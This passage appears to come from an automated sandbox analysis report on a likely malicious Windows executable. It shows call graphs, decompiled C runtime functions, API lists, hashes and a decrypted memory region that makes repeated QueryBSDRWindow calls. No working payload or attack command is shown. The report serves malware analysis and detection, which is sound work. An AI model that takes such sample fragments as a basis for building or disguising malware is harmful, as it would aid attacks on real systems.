1606->1607 1607->1605 1608 4126d0 1610 4126de 1608->1610 1609 412724 1612 404700 __invalid_parameter 16 API calls 1609->1612 1610->1609 1611 412754 _memset 1610->1611 1613 4127e9 1611->1613 1617 412819 _memset 1611->1617 1615 412747 _memset 1612->1615 1614 404700 __invalid_parameter 16 API calls 1613->1614 1614->1615 1616 4128f4 1619 404700 __invalid_parameter 16 API calls 1616->1619 1617->1616 1618 412924 _memset 1617->1618 1618->1615 1620 404700 __invalid_parameter 16 API calls 1618->1620 1619->1615 1620->1615 1766 40fab5 1769 40abf0 LeaveCriticalSection 1766->1769 1768 40fabc 1769->1768 1770 4130f8 1771 41310a 1770->1771 1773 413118 @_EH4_CallFilterFunc@8 1770->1773 1772 40ee60 _ValidateLocalCookies 5 API calls 1771->1772 1772->1773 1634 40fc1f 1635 40fc30 1634->1635 1636 40fc25 InterlockedDecrement 1634->1636 1636->1635

                                                                                                          Callgraph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          • Opacity -> Relevance
                                                                                                          • Disassembly available
                                                                                                          callgraph 0 Function_00406E40 1 Function_00404E40 31 Function_00404770 1->31 2 Function_0040AE40 3 Function_00406340 32 Function_00406270 3->32 4 Function_00407EC0 5 Function_00412C40 6 Function_00411040 7 Function_00412E40 7->32 8 Function_004163C0 46 Function_00404700 8->46 9 Function_00412FC0 10 Function_0041A1C0 87 Function_004110B0 10->87 11 Function_0041A9C9 12 Function_0040D2D0 13 Function_0040C9D0 14 Function_00412250 39 Function_00404670 14->39 14->46 47 Function_00404600 14->47 15 Function_004126D0 15->39 15->46 16 Function_004187D0 16->39 16->46 17 Function_0041315A 18 Function_00406360 55 Function_00406310 18->55 19 Function_0040D260 20 Function_00403D60 21 Function_0040D060 21->12 35 Function_004048F0 21->35 42 Function_0040D0F5 21->42 60 Function_0040D390 21->60 22 Function_0040EE60 22->13 23 Function_004020E0 23->2 24 Function_0040F1E0 24->24 25 Function_00407EE0 26 Function_004081E0 26->22 27 Function_00410D60 27->39 27->46 28 Function_00412E60 52 Function_0041A780 28->52 29 Function_00413068 29->11 30 Function_0041A9E8 29->30 31->13 31->22 31->39 32->55 33 Function_00407970 34 Function_0040ABF0 36 Function_00413171 36->11 37 Function_0040F270 38 Function_00403D70 38->12 38->20 79 Function_0040D330 38->79 39->24 40 Function_004046F0 41 Function_004013F0 42->34 43 Function_004130F8 43->22 43->29 44 Function_0040BF80 45 Function_00407C80 45->3 45->4 45->18 45->25 48 Function_00407F00 45->48 81 Function_00407FB0 45->81 89 Function_00407E38 45->89 46->13 46->18 46->31 48->34 49 Function_00417800 49->39 49->41 49->46 69 Function_00401420 49->69 86 Function_004174B0 49->86 50 Function_00416480 50->3 50->18 50->32 51 Function_00417B80 51->49 52->22 52->39 61 Function_00407A90 52->61 83 Function_00410930 52->83 53 Function_00406A88 53->34 54 Function_0041318A 55->33 56 Function_00402310 57 Function_0040C310 58 Function_0040A910 58->9 59 Function_00406410 59->18 75 Function_004166A0 60->75 61->45 62 Function_00410590 63 Function_0041319F 64 Function_0040FC1F 65 Function_0040AF20 66 Function_00407F20 66->3 66->7 66->32 66->40 66->57 66->62 66->65 74 Function_00412FA0 66->74 84 Function_00412FB0 66->84 85 Function_00412AB0 66->85 67 Function_00406920 67->53 68 Function_00408020 68->17 68->26 68->36 68->54 73 Function_00412D20 68->73 78 Function_004131A4 68->78 70 Function_00404520 70->31 71 Function_0040BFA0 71->19 71->44 72 Function_00417420 73->5 77 Function_00412CA0 73->77 76 Function_004147A0 76->41 76->69 78->29 80 Function_00406B30 80->39 80->46 82 Function_00417330 82->82 83->18 86->0 86->41 86->46 86->69 86->76 88 Function_0040FAB5 88->34 89->48

                                                                                                          Executed Functions

                                                                                                          Function 00406340 Relevance: 1.5, APIs: 1, Instructions: 8COMMONLIBRARYCODE
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 0 406340-406347 call 406270 2 40634c-406350 0->2
                                                                                                          C-Code - Quality: 100%
                                                                                                          			E00406340() {
				void* _t1;

				_t1 = E00406270(0); // executed
				return _t1;
			}




                                                                                                          0x00406347
                                                                                                          0x00406350

                                                                                                          APIs
                                                                                                          • __encode_pointer.LIBCMTD ref: 00406347
                                                                                                            • Part of subcall function 00406270: TlsGetValue.KERNEL32(00000001), ref: 00406285
                                                                                                            • Part of subcall function 00406270: TlsGetValue.KERNEL32(00000001,00000001), ref: 004062A6
                                                                                                            • Part of subcall function 00406270: __crt_wait_module_handle.LIBCMTD ref: 004062BC
                                                                                                            • Part of subcall function 00406270: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 004062D6
                                                                                                            • Part of subcall function 00406270: RtlEncodePointer.NTDLL(?), ref: 004062F7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.465874772.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.465862526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.465903756.000000000041E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.465922595.0000000000427000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.465935735.0000000000428000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.465983851.000000000044F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.467673993.00000000023B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_400000_0fd7de5367376231a788872005d7ed4f.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Value$AddressEncodePointerProc__crt_wait_module_handle__encode_pointer
                                                                                                          • String ID:
                                                                                                          • API String ID: 568403282-0
                                                                                                          • Opcode ID: f00befe9f6ce37f0a9e0ee05923ac5330ac6df44ba7645856ef0dc2498812e42
                                                                                                          • Instruction ID: 31428026cba3fa05dafd68cb6998487dd02dbad78c73646dc55d5d451d242297
                                                                                                          • Opcode Fuzzy Hash: f00befe9f6ce37f0a9e0ee05923ac5330ac6df44ba7645856ef0dc2498812e42
                                                                                                          • Instruction Fuzzy Hash: ACA012A244420833D40030833803F02350C43C1738E090075F50D051826852A4244097
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 004020E0 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 3 4020e0-4020e5 call 40ae40 5 4020ea call 402100 3->5
                                                                                                          C-Code - Quality: 100%
                                                                                                          			_entry_() {
				void* _t3;
				void* _t4;

				E0040AE40(); // executed
				return L00402100(_t3, _t4);
			}





                                                                                                          0x004020e5
                                                                                                          0x004020f0

                                                                                                          APIs
                                                                                                          • ___security_init_cookie.LIBCMTD ref: 004020E5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.465874772.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.465862526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.465903756.000000000041E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.465922595.0000000000427000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.465935735.0000000000428000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.465983851.000000000044F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.467673993.00000000023B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_400000_0fd7de5367376231a788872005d7ed4f.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ___security_init_cookie
                                                                                                          • String ID:
                                                                                                          • API String ID: 3657697845-0
                                                                                                          • Opcode ID: e5dd8bf813fb517254f84b6b6e16f20edad6374c86a69e55565686c8cf0eafea
                                                                                                          • Instruction ID: 621c916d810ec99fe97919bae27be7f93347b28545652bcd38ca6aa05a212a64
                                                                                                          • Opcode Fuzzy Hash: e5dd8bf813fb517254f84b6b6e16f20edad6374c86a69e55565686c8cf0eafea
                                                                                                          • Instruction Fuzzy Hash: 33A0022104475816915033A7454FE0A754E48C4718795003A7718261C31DFCA81140EF
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Non-executed Functions

                                                                                                          Function 0040EE60 Relevance: 7.6, APIs: 5, Instructions: 59COMMONLIBRARYCODE
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          C-Code - Quality: 85%
                                                                                                          			E0040EE60(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				long _t15;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr* _t29;
				void* _t34;

				_t25 = __esi;
				_t24 = __edi;
				_t22 = __edx;
				_t20 = __ecx;
				_t19 = __ebx;
				_t6 = __eax;
				_t34 = _t20 -  *0x4277e4; // 0xa129e729
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x44fe78 = _t6;
				 *0x44fe74 = _t20;
				 *0x44fe70 = _t22;
				 *0x44fe6c = _t19;
				 *0x44fe68 = _t25;
				 *0x44fe64 = _t24;
				 *0x44fe90 = ss;
				 *0x44fe84 = cs;
				 *0x44fe60 = ds;
				 *0x44fe5c = es;
				 *0x44fe58 = fs;
				 *0x44fe54 = gs;
				asm("pushfd");
				_pop( *0x44fe88);
				 *0x44fe7c =  *_t29;
				 *0x44fe80 = _v0;
				 *0x44fe8c =  &_a4;
				 *0x44fdc8 = 0x10001;
				_t11 =  *0x44fe80; // 0x0
				 *0x44fd7c = _t11;
				 *0x44fd70 = 0xc0000409;
				 *0x44fd74 = 1;
				_t21 =  *0x4277e4; // 0xa129e729
				_v812 = _t21;
				_t23 =  *0x4277e8; // 0x5ed618d6
				_v808 = _t23;
				 *0x44fdc0 = IsDebuggerPresent();
				_push(1);
				E0040C9D0(_t12);
				SetUnhandledExceptionFilter(0);
				_t15 = UnhandledExceptionFilter(0x423f00);
				if( *0x44fdc0 == 0) {
					_push(1);
					E0040C9D0(_t15);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                          0x0040ee60
                                                                                                          0x0040ee60
                                                                                                          0x0040ee60
                                                                                                          0x0040ee60
                                                                                                          0x0040ee60
                                                                                                          0x0040ee60
                                                                                                          0x0040ee60
                                                                                                          0x0040ee66
                                                                                                          0x0040ee68
                                                                                                          0x0040ee68
                                                                                                          0x0041722b
                                                                                                          0x00417230
                                                                                                          0x00417236
                                                                                                          0x0041723c
                                                                                                          0x00417242
                                                                                                          0x00417248
                                                                                                          0x0041724e
                                                                                                          0x00417255
                                                                                                          0x0041725c
                                                                                                          0x00417263
                                                                                                          0x0041726a
                                                                                                          0x00417271
                                                                                                          0x00417278
                                                                                                          0x00417279
                                                                                                          0x00417282
                                                                                                          0x0041728a
                                                                                                          0x00417292
                                                                                                          0x0041729d
                                                                                                          0x004172a7
                                                                                                          0x004172ac
                                                                                                          0x004172b1
                                                                                                          0x004172bb
                                                                                                          0x004172c5
                                                                                                          0x004172cb
                                                                                                          0x004172d1
                                                                                                          0x004172d7
                                                                                                          0x004172e3
                                                                                                          0x004172e8
                                                                                                          0x004172ea
                                                                                                          0x004172f4
                                                                                                          0x004172ff
                                                                                                          0x0041730c
                                                                                                          0x0041730e
                                                                                                          0x00417310
                                                                                                          0x00417315
                                                                                                          0x0041732d

                                                                                                          APIs
                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 004172DD
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004172F4
                                                                                                          • UnhandledExceptionFilter.KERNEL32(00423F00), ref: 004172FF
                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 0041731D
                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 00417324
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.465874772.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000007.00000002.465862526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.465903756.000000000041E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.465922595.0000000000427000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.465935735.0000000000428000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.465983851.000000000044F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000007.00000002.467673993.00000000023B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_400000_0fd7de5367376231a788872005d7ed4f.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                          • String ID:
                                                                                                          • API String ID: 2579439406-0
                                                                                                          • Opcode ID: d77ef2986b6ece57a3f22b9b6c88b6234d9d2aa024e6ed81b53eb45df935dbbe
                                                                                                          • Instruction ID: 0e68da6c3980ea9961357d55aa9078e6f7cd450385757b10095ee43c89e96804
                                                                                                          • Opcode Fuzzy Hash: d77ef2986b6ece57a3f22b9b6c88b6234d9d2aa024e6ed81b53eb45df935dbbe
                                                                                                          • Instruction Fuzzy Hash: E321DEBD900604DBD3009F66FD446853BB0BB1A312FA0513AE90993372E7B5A989CB4D
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:4.2%
                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                          Signature Coverage:0%
                                                                                                          Total number of Nodes:19
                                                                                                          Total number of Limit Nodes:0
                                                                                                          execution_graph 1411 c20368 1412 c20387 1411->1412 1414 c2095b QueryBSDRWindow 1412->1414 1415 c20968 QueryBSDRWindow 1412->1415 1413 c20425 1414->1413 1415->1413 1395 c20889 1396 c208a5 QueryBSDRWindow 1395->1396 1397 c208be 1396->1397 1398 c203bd 1399 c203c4 1398->1399 1403 c2095b 1399->1403 1407 c20968 1399->1407 1400 c20425 1404 c2098c 1403->1404 1405 c20a20 QueryBSDRWindow 1404->1405 1406 c20a2e 1404->1406 1405->1406 1406->1400 1408 c2098c 1407->1408 1409 c20a20 QueryBSDRWindow 1408->1409 1410 c20a2e 1408->1410 1409->1410 1410->1400

                                                                                                          Callgraph

                                                                                                          Executed Functions

                                                                                                          Function 00C20968 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 506COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 0 c20968-c20993 2 c20999-c20a2c QueryBSDRWindow 0->2 3 c20a2e-c20a30 0->3 2->3 42 c20a32 2->42 4 c20a37-c20a3c 3->4 6 c20a42-c20a7a 4->6 7 c20b1e-c20bc2 4->7 23 c20aa1-c20afc 6->23 24 c20a7c-c20a9a 6->24 44 c20bc8-c20c8b 7->44 45 c20c9e-c20ca7 7->45 62 c20b01 23->62 24->23 42->4 44->45 46 c20d51-c20d5a 45->46 47 c20cad-c20d3e 45->47 50 c20d7a-c20d83 46->50 51 c20d5c-c20d73 46->51 47->46 52 c20d85-c20d96 50->52 53 c20da9-c20db2 50->53 51->50 52->53 58 c20f33-c20f3a 53->58 59 c20db8-c20e06 53->59 78 c20f1c-c20f2d 59->78 62->7 78->58 81 c20e0b-c20e14 78->81 84 c20f40-c20fd1 81->84 85 c20e1a-c20f1a 81->85 113 c20fd7-c20fe8 84->113 114 c210ca 84->114 85->78 133 c20f3b 85->133 120 c20fea-c2100b 113->120 116 c210cc-c210d3 114->116 128 c21012-c21048 120->128 129 c2100d 120->129 138 c2104a 128->138 139 c2104f-c21077 128->139 129->128 133->84 138->139 143 c21079-c2107b 139->143 144 c2107d-c210a1 139->144 143->116 147 c210a3-c210a8 144->147 148 c210aa-c210b4 144->148 147->116 149 c210b6-c210b8 148->149 150 c210ba-c210c4 148->150 149->116 150->114 150->120
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.450809845.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_c20000_gay.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryWindow
                                                                                                          • String ID: :@!q$X1Hq
                                                                                                          • API String ID: 2116839266-3721188810
                                                                                                          • Opcode ID: 23b0161b563cf4f9b9c418b1fd395fdc680d39023f866f21d4ee1fd078f99c0f
                                                                                                          • Instruction ID: 840b8349e0898099712e621e12441288ff541d6267ebbcff8969551e1d4cb584
                                                                                                          • Opcode Fuzzy Hash: 23b0161b563cf4f9b9c418b1fd395fdc680d39023f866f21d4ee1fd078f99c0f
                                                                                                          • Instruction Fuzzy Hash: D3026034700215CFDB18FB78D85066D77E2AF88304B65857AE806DB3A6EF39AC42DB51
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 00C2095B Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 298COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 151 c2095b-c20993 153 c20999-c20a2c QueryBSDRWindow 151->153 154 c20a2e-c20a30 151->154 153->154 193 c20a32 153->193 155 c20a37-c20a3c 154->155 157 c20a42-c20a7a 155->157 158 c20b1e-c20bc2 155->158 174 c20aa1-c20afc 157->174 175 c20a7c-c20a9a 157->175 195 c20bc8-c20c8b 158->195 196 c20c9e-c20ca7 158->196 213 c20b01 174->213 175->174 193->155 195->196 197 c20d51-c20d5a 196->197 198 c20cad-c20d3e 196->198 201 c20d7a-c20d83 197->201 202 c20d5c-c20d73 197->202 198->197 203 c20d85-c20d96 201->203 204 c20da9-c20db2 201->204 202->201 203->204 209 c20f33-c20f3a 204->209 210 c20db8-c20e06 204->210 229 c20f1c-c20f2d 210->229 213->158 229->209 232 c20e0b-c20e14 229->232 235 c20f40-c20fd1 232->235 236 c20e1a-c20f1a 232->236 264 c20fd7-c20fe8 235->264 265 c210ca 235->265 236->229 284 c20f3b 236->284 271 c20fea-c2100b 264->271 267 c210cc-c210d3 265->267 279 c21012-c21048 271->279 280 c2100d 271->280 289 c2104a 279->289 290 c2104f-c21077 279->290 280->279 284->235 289->290 294 c21079-c2107b 290->294 295 c2107d-c210a1 290->295 294->267 298 c210a3-c210a8 295->298 299 c210aa-c210b4 295->299 298->267 300 c210b6-c210b8 299->300 301 c210ba-c210c4 299->301 300->267 301->265 301->271
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.450809845.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_c20000_gay.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryWindow
                                                                                                          • String ID: :@!q
                                                                                                          • API String ID: 2116839266-1708465744
                                                                                                          • Opcode ID: fb381575e678684f92c1a05a28b5e85bc427c5fc62e2caf3b2289b37a14c0919
                                                                                                          • Instruction ID: 698ed0853eb239c64d9ee61e2f93065e948a92e256a6efabcdb79f07914c81d9
                                                                                                          • Opcode Fuzzy Hash: fb381575e678684f92c1a05a28b5e85bc427c5fc62e2caf3b2289b37a14c0919
                                                                                                          • Instruction Fuzzy Hash: EFB18538705211CFDB14FB74E85066D37E3AF88308B65857AE506973AADF39AC42DB50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 00C20889 Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 398 c20889-c208b3 QueryBSDRWindow 400 c208be-c20930 398->400
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.450809845.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_c20000_gay.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2116839266-0
                                                                                                          • Opcode ID: f5044c5ef78d717cbf696c8c6abef14476e0394ac9062159a0d4258b0397ef2b
                                                                                                          • Instruction ID: 5908959d60c3c080bca071cff83ccf02c7db34520849a429ca6b704344c31106
                                                                                                          • Opcode Fuzzy Hash: f5044c5ef78d717cbf696c8c6abef14476e0394ac9062159a0d4258b0397ef2b
                                                                                                          • Instruction Fuzzy Hash: 39015E74608383DFCB04FB74D4944497BE2EB80308B64896DF085CB26AEA7D98849B52
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%